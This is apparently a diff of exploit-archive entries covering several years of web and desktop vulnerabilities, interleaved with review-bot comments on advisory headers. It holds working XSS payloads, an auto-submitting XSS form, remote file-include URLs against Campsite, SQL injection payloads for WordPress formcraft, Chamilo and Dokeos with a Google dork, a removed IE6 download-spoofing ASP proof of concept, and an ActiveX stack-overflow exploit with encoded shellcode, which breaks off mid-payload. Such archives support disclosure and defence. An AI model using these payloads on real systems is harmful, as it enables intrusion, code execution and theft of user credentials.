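+<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
+<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
+<input name="remove[0]" type="hidden" value="off">
+<input name="quantity[0:49]" type="hidden" value="1">
+<input name="remove[1]" type="hidden" value="off">
+<input name="quantity[1:50]" type="hidden" value="1">
+<input name="remove[2]" type="hidden" value="off">
+<input name="quantity[2:55]" type="hidden" value="1">
+<input name="remove[3]" type="hidden" value="off">
+<input name="quantity[3:42]" type="hidden" value="1">
+<input name="remove[4]" type="hidden" value="off">
+<input name="quantity[4:51]" type="hidden" value="1">
+<input name="coupon" type="hidden" value="email@address.com">
+<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
+</form>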


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23864/info
Kayako eSupport is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Kayako eSupport 3.00.90 is vulnerable to this issue; other versions may also be affected.
http://example.com/index.php?_m="><script>alert(1);</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23873/info
Advanced Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Advanced Guestbook 2.4.2; other versions may also be affected.
http://www.example.com/picture.php?size[0]=1&size[1]=1&img=1&picture=[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Alias.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Article.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleComment.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleData.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleImage.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleType.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Country.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Event.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Image.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Issue.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/IssuePublish.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Language.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Log.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Section.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/ShortURL.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Subscription.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/SystemPref.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Template.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/TimeUnit.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/Topic.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/UrlType.php?g_DocumentRoot=shell.txt?

10
platforms/php/webapps/29998.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/classes/UserType.php?g_DocumentRoot=shell.txt?

28
platforms/php/webapps/30002.txt Executable file

@ -0,0 +1,28 @@
#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
##########################################
##############
Milad Hacking
We Love Mohammad
##############
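Review bot: The header never identifies the affected component version or vendor; `# Software Link : www.wordpress.org` points at the platform rather than the formcraft plugin, and there is no `# Version :` line, so nothing here tells a reader which plugin releases are affected or whether a patched one exists. Suggest adding `# Vendor Homepage : [formcraft plugin page — placeholder]` and `# Version : [affected formcraft versions — placeholder]` to the header block and correcting the Software Link accordingly. The `# CVE :` field that the Notepad++ entry later in this commit carries is also absent here; an explicit "none assigned" is better than silence.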


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/configuration.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/db_connect.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23874/info
Campsite is prone to multiple remote file-include vulnerabilities.
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
This issue affects Campsite 2.6.1. Earlier versions may also be affected.
http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?

73
platforms/php/webapps/30012.txt Executable file

@ -0,0 +1,73 @@
Advisory ID: HTB23182
Product: Chamilo LMS
Vendor: Chamilo Association
Vulnerable Version(s): 1.9.6 and probably prior
Tested Version: 1.9.6
Advisory Publication: November 6, 2013 [without technical details]
Vendor Notification: November 6, 2013
Vendor Patch: November 9, 2013
Public Disclosure: November 27, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6787
Risk Level: Medium
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in Chamilo LMS: CVE-2013-6787
The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example displays version of MySQL server:
<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0" value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1" value="password">
<input type="hidden" name="password2" value="password">
<input type="hidden" name="apply_change" value="">
<input type="hidden" name="firstname" value="first_name">
<input type="hidden" name="lastname" value="last_name">
<input type="hidden" name="username" value="username">
<input type="hidden" name="official_code" value="USER">
<input type="hidden" name="phone" value="">
<input type="hidden" name="language" value="">
<input type="hidden" name="extra_mail_notify_invitation" value="">
<input type="hidden" name="extra_mail_notify_message" value="">
<input type="hidden" name="extra_mail_notify_group_message" value="">
<input type="hidden" name="_qf__profile" value="">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").
-----------------------------------------------------------------------------------------------
Solution:
Edit the source code and apply changes according to vendor's instructions:.
More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23182 - https://www.htbridge.com/advisory/HTB23182 - SQL Injection in Chamilo LMS.
[2] Chamilo LMS - http://www.chamilo.org/ - Chamilo aims at bringing you the best e-learning and collaboration platform in the open source world.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
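Review bot: The precondition that makes this injection reachable — the install having "Encryption method" set to "none" so passwords are stored unencrypted — is stated only once, after the PoC, while the header's Risk Level and CVSS vector give no hint of it; repeating that sentence next to "Vulnerable Version(s)" would stop readers from overestimating exposure on installs that do hash passwords. The Solution line also ends with a stray `:.` and names no patched release even though "Vendor Patch: November 9, 2013" is given above; `Solution: Apply the vendor's source changes (patch dated November 9, 2013); see the Chamilo security page linked below.` would tie the two together.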

51
platforms/php/webapps/30013.txt Executable file

@ -0,0 +1,51 @@
Advisory ID: HTB23181
Product: Dokeos
Vendor: Dokeos
Vulnerable Version(s): 2.2 RC2 and probably prior
Tested Version: 2.2 RC2
Advisory Publication: October 30, 2013 [without technical details]
Vendor Notification: October 30, 2013
Public Disclosure: November 27, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6341
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Dokeos, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in Dokeos: CVE-2013-6341
The vulnerability exists due to insufficient validation of "language" HTTP GET parameter passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database and gain complete control over the vulnerable web application.
The following exploitation example displays version of MySQL server:
http://[host]/index.php?language=0%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8%20--%202
-----------------------------------------------------------------------------------------------
Solution:
Vendor did not reply to 6 notifications by email, 1 notification via twitter, 2 forum threads/direct messages. Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23181-patch.zip
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23181 - https://www.htbridge.com/advisory/HTB23181 - SQL Injection in Dokeos.
[2] Dokeos - http://www.dokeos.com/ - Dokeos, the flexible, enterprise-ready e-learning software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
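Review bot: `Solution Status: Solution Available` in the header contradicts the Solution section, which says the vendor never responded and that only an unofficial patch from the researchers exists; a reader scanning the header will assume a vendor fix. Suggest `Solution Status: No official fix; unofficial third-party patch available` so the header matches the body. Since the only remedy offered is third-party code, the Solution section should say so plainly rather than implying vendor endorsement.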


@ -0,0 +1,35 @@
# Exploit Title: Notepad++ - Notepad# plugin local exploit
# Google Dork:
# Date: 2013-12-01
# Exploit Author: Sun Junwen
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# Version: Notepad ++ 6.3.2 with Notepad# plugin (1.5) and Explorer plugin
(1.8.2)
# Tested on: Windows XP SP3 EN
# CVE :
1. Poc
With Notepad# plugin (1.5) and Explorer plugin (1.8.2) installed in Notepad
++ 6.3.2, open the html file in attachement, click Enter in the last
</script> tag, Npp will crash and calc.exe will open. Without Explorer
plugin, these still can be exploit. Explorer plugin makes this easier.
2. Root cause
NotepadSharp plugin has several stack buffer overflow bug.
In its PluginDefinition.cpp file, there are some char buffer whose length
are 9999. They are all defined on stack.
So if some strcpy/memcpy copy more than 9999 chars to these buffers, it
leads to a stack overflow.
3. Tested on
Windows XP SP3 EN
Notepad ++ 6.3.2
Notepad# plugin (1.5) and Explorer plugin (1.8.2)
Sun Junwen
Trendmicro, CDC
Exploit: http://www.exploit-db.com/sploits/30007.zip
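Review bot: The `# Version:` header line is wrapped mid-sentence so `(1.8.2)` lands on its own line, the `# CVE :` field is empty, and the PoC refers to "the html file in attachement" that is not in this entry — only the zip link at the bottom. Suggest rejoining the line as `# Version: Notepad++ 6.3.2 with Notepad# plugin (1.5) and Explorer plugin (1.8.2)`, marking the CVE explicitly as "none assigned" if that is the case, and pointing the PoC sentence at the zip link. "attachement" should read "attachment" and "these still can be exploit" should read "this can still be exploited".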



@ -1,420 +0,0 @@
-Introduction-
Microsoft Internet Explorer is the default webbrowser on Windows
operating systems.
Vendor link: http://www.microsoft.com
IE link: http://windows.microsoft.com/en-us/internet-explorer/browser-ie
Vulnerable version: Internet Explorer 6 on Windows XP SP3 and Windows
Server 2003 (on Win 2003 it only works without the enhanced IE mode)
and also below OS versions (not supported by Microsoft anymore) like
Windows 2000, 98, ME.
Author/Discoverer: Eduardo Prado http://secumania.info Security Group
- The vulnerability-
IE 6 contains a vulnerability that allows malicious users to spoof the
file extension presented in the file download dialog.
The file download dialog presents only the "Save" button to the user.
When the file is saved to disk an unsafe extension
such as ".HTA" is appended to the file. HTA fIles allows execution of
arbitrary code in the system.
See the proof of concept for demonstration.
Successfully tested on IE 6 on a fully patched Windows XP SP3.
=========================PIC-download.asp========================================================
<%
'--------------------------------------------
Response.Buffer = True
Dim strFilePath, strFileSize, strFileName
Const adTypeBinary = 1
strFilePath = "C:\webroot\PICTURE YOU WILL FIND SO AMAZING4. JPG "
strFileName = "PICTURE YOU WILL FIND SO AMAZING4. JPG "
strFileSize = 5000
Response.Clear
'8*******************************8
' Requires MDAC 2.5 to be stable
' I recommend MDAC 2.6 or 2.7
'8*******************************8
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath
strFileType = lcase(Right(strFileName, 4))
' Feel Free to Add Your Own Content-Types Here
Select Case strFileType
Case ". JPEG "
ContentType = "application/hta"
Case Else
'Handle All Other Files
ContentType = "application/hta"
End Select
Response.AddHeader "X-Download-Options", "noopen"
Response.AddHeader "Content-Disposition", "attachment; filename=" &
strFileName
'Response.AddHeader "Content-Length", strFileSize
' In a Perfect World, Your Client would also have UTF-8 as the default
' In Their Browser
Response.Charset = "UTF-8"
'for only displaying the "Save" button in the file download prompt. use
"nosave" to only display the "open" button.
Response.ContentType = ContentType
Response.BinaryWrite objStream.Read
Response.Flush
objStream.Close
Set objStream = Nothing
%>
==========eof====================================================================================
===========================PICTURE YOU WILL FIND SO AMAZING.JPEG (Base64
encoded)===================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==========eof====================================================================================
Instructions:
place the 2 files on a webserver, edit the "ASP" file to match the
correct local path to the other file and access the asp
file. A download prompt should appear, upon saving the file to disk,
an "HTA" extension is appended, but not shown due to the file name
length. (Tested on a Windows system with screen dimensions (1024x768)
The "PICTURE YOU WILL FIND SO AMAZING.JPEG (Base64 encoded)" file is
simply a Winhelp (.HLP) file with script code appended at the end.
Tip: Do not put "<html>" or "<img>" tags in the file.


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23838/info
Sienzo Digital Music Mentor is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to adequately check boundaries on data supplied to multiple ActiveX control methods.
An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.
Digital Music Mentor 2.6.0.4 is vulnerable; other versions may also be affected.
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ 
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ 
